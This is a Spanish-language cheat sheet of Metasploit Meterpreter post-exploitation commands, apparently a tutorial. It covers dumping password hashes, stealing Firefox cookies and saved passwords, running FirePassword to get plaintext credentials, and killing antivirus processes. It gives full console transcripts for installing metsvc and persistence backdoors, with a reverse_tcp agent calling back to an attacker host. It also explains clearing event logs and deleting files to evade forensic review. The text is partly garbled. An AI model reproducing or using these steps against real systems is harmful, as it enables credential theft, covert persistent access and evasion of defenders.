Comandos Meterpreterrun get_env -> Sirve para obteenr mas informacion del sistema que se infectogetpid -> Sirve para saber que numero e poceso estamos ocupandogetuid -> Sirve para saber que privilegios tenemos en el sistemagetsystem -> Srive para elevar los privilegiosRUN -> sirve para correr scripts en meterpreterrun checkvm -> Sirve para saber si el equipo atacado es virtual o fisicorun get_application_list ->Sirve para ver la lista de programas instalados en el pc run scraper ->Nos permite acceder a los registros de windows y hashes de los usuariosrun credcollect -> NOs permite obtener los hashes que almacena la base de datosdle equipo objetivorun enum_firefox -> Con este script se puede saer si el equipo tiene instalado firefox y si es asi se descargan cookies, contraseas guardadas, historial de navegacin, etc.Puede ser interesante extraer los datos los usuarios y contraseas all almacenados, para esto se utiliza del programa FirePassword, el procedimiento es el siguiente:1. Descargar el programa (.exec)2. Navegar desde Meterpreter al directorio donde se ha descargado o se encuentra almacenado el programa con el uso de los comandos getlwd y lcd (estos comandos permiten consultar el directorio actual (local) y cambiar la ruta de directorio actual (local)metsrv -> Otra forma de mantener el acceso a un objetivo, es por medio del establecimiento de una puerta trasera, es posible definir una puerta trasera por medio del uso de la extensin metsvc de meterpreter, de esta forma se puede acceder posteriormente al cliente sin necesidad de esperar nuevamente a que la maquina comprometida establezca la conexin.Una vez obtenida la sesin meterpreter es necesario buscar el proceso explorer, (en donde se intentar establecer la puerta trasera) aunque no necesariamente tiene que ser este proceso en particular ya que se puede ejecutar el comando sobre cualquier identificador de proceso valido, se indica el proceso explorer ya que es uno de los procesos mas importantes del sistema operativo:meterpreter > psProcess list============PID Name Arch Session User Path - - - - -0 [System Process]4 System x86 0 NT AUTHORITY\SYSTEM476 smss.exe x86 0 NT AUTHORITY\SYSTEM \SystemRoot\System32\smss.exe.meterpreter > migrate 244[*] Migrating to 244[*] Migration completed successfully.Una vez realizado el proceso de migracin es posible ejecutar el comandometerpreter > run metsvc[*] Creating a meterpreter service on port 31337[*] Creating a temporary installation directory C:\DOCUME~1\Owner\LOCALS~1\Temp\lZBdswMe[*] >> Uploading metsrv.dll[*] >> Uploading metsvc-server.exe[*] >> Uploading metsvc.exe[*] Starting the service* Installing service metsvc* Starting serviceService metsvc successfully installed.Si ya existe una puerta trasera instalada es posible eliminarla con la opcin -r.Ahora que esta establecida la puerta trasera, es posible iniciar en cualquier momento un puente reverso hacia la maquina del atacante de forma automtica, as es posible usar el exploit multi/handler que permitir realizar estas acciones, adicionalmente, se define un PAYLOAD que realizar la conexin inmediatamente entre las dos maquinas:msf exploit(handler) > set PAYLOAD windows/metsvc_bind_tcpPAYLOAD => windows/metsvc_bind_tcpmsf exploit(handler) > set RHOST 192.168.1.34RHOST => 192.168.1.34msf exploit(handler) > set LPORT 31337LPORT => 31337msf exploit(handler) > exploit[*] Starting the payload handler[*] Started bind handler[*] Meterpreter session 4 opened (192.168.1.33:38034 -> 192.168.1.34:31337) at Sun Mar 06 21:53:51 +0100 2011meterpreter >NOTA: Aunque se puede eliminar esta puerta trasera, en realidad lo que hace la opcin -r es eliminar las entradas en el registro de la maquina remota pero los ficheros cargados a la misma, NO SE ELIMINAN, por esta razn es importante realizar el borrado de las libreras (.dll) y los ficheros ejecutables (.exe) de forma manual, para evitar dejar rastros que posiblemente sean fcilmente detectables por un software de auditoria o un proceso forense, ademas de esto tambin es necesario finalizar cualquier proceso que se encuentre en ejecucin y que dependa de dichos ficheros.3. Posteriormente hacer uso del comando upload de Meterpreter y subir el fichero ejecutable a la maquina remota.4. Ahora ejecutar el comando shell para abrir una consola en el sistema remoto y ejecutar el programa FirePassword en la maquina remota, con esto, el programa dar un listado de las rutas de navegacin empleadas y sus correspondientes credenciales en texto plano (en el caso de que se encuentren almacenadas en el navegador).winenum -> Se trata de un script que retorna toda la informacin posible sobre el sistema objetivo, mezclando algunos de los scripts anteriormente mencionadoprefetchtool -> Permite obtener informacin sobre los programas que han sido frecuentemente utilizados en el sistema comprometido, reportando las fechas de acceso y creacin de cada uno de los programas encontrados, este script se vale de un ejecutable que debe estar incluido en el framework, en el caso de que no se encuentre, se intentar descargar de internet automticamente, por lo tanto para uso es necesario tener conexin a internet(si se cuenta con el fichero prefetch.exe en el directorio de metasploit) este fichero es instalado en el directorio /data/prefetch.exegetcountermeasure -> Este script permite obtener informacin sobre los sistemas de seguridad implementados en el objetivo, tales como AV y reglas de Firewall, y si es posible intenta matar el proceso.clearev ->Se trata de una utilidad muy interesante que permite eliminar todos los log registrados en los ficheros de eventos de la maquina comprometida, de esta forma es posible ocultar las trazas de las acciones llevadas a cabo y que muy probablemente han quedado monitorizadas.En un sistema basado en Windows, la herramienta para ver los log se encuentra ubicada en Configuracin Herramientas Administrativas Event Viewerpersistence ->Una vez explotado un sistema, una puerta persistente que nos permita conectarnos en cualquier momento a nuestro objetivo sin necesidad de explotarlo nuevamente es algo deseable, para realizar esta tarea existen algunas otras formas que implican la modificacin del registro de windows de forma manual, en este caso vamos a hacer uso de uno de los payloads que existen en una sesin meterpreter para instalar el servicio.Nota: No especificamos ningn valor para autenticacin, lo que significa que cualquier usuario en la maquina remota, eventualmente intentara realizar una conexin a la puerta trasera, esto puede ser un riesgo de seguridad alto, por lo tanto se recomienda tener precaucin y limpiar cualquier registro (huella) una vez se ha terminado de realizar las tareas correspondientes.meterpreter > run persistence -hMeterpreter Script for creating a persistent backdoor on a target host.OPTIONS:-A Automatically start a matching multi/handler to connect to the agent-L Location in target host where to write payload to, if none %TEMP% will be used.-P Payload to use, default is windows/meterpreter/reverse_tcp.-S Automatically start the agent on boot as a service (with SYSTEM privileges)-T Alternate executable template to use-U Automatically start the agent when the User logs on-X Automatically start the agent when the system boots-h This help menu-i The interval in seconds between each connection attempt-p The port on the remote host where Metasploit is listening-r The IP of the system running Metasploit listening for the connect backmeterpreter > run persistence -U -i 5 -p 4444 -r 192.168.1.33[*] Running Persistance Script[*] Resource file for cleanup created at /root/.msf3/logs/persistence/OWNER_20110307.1848/OWNER_20110307.1848.rc[*] Creating Payload=windows/meterpreter/reverse_tcp LHOST=192.168.1.33 LPORT=4444[*] Persistent agent script is 610514 bytes long[+] Persisten Script written to C:\WINDOWS\TEMP\cJYeLTeHhKhX.vbs[*] Executing script C:\WINDOWS\TEMP\cJYeLTeHhKhX.vbs[+] Agent executed with PID 2840[*] Installing into autorun as HKCU\Software\Microsoft\Windows\CurrentVersion\Run\DfctDISwu[+] Installed into autorun as HKCU\Software\Microsoft\Windows\CurrentVersion\Run\DfctDISwuAhora se puede reiniciar la maquina comprometida, con el fin de iniciar el proceso recin creado, esto se puede hacer con el comando reboot y una vez el usuario inicie sesin nuevamente, se iniciar la conexin hacia la maquina del atacante, por lo tanto, dicha maquina debe tener el exploit preparado con un PAYLOAD adecuado, tal como reverse_tcp, reverse_http, reverse_https o metsvc_bind_tcp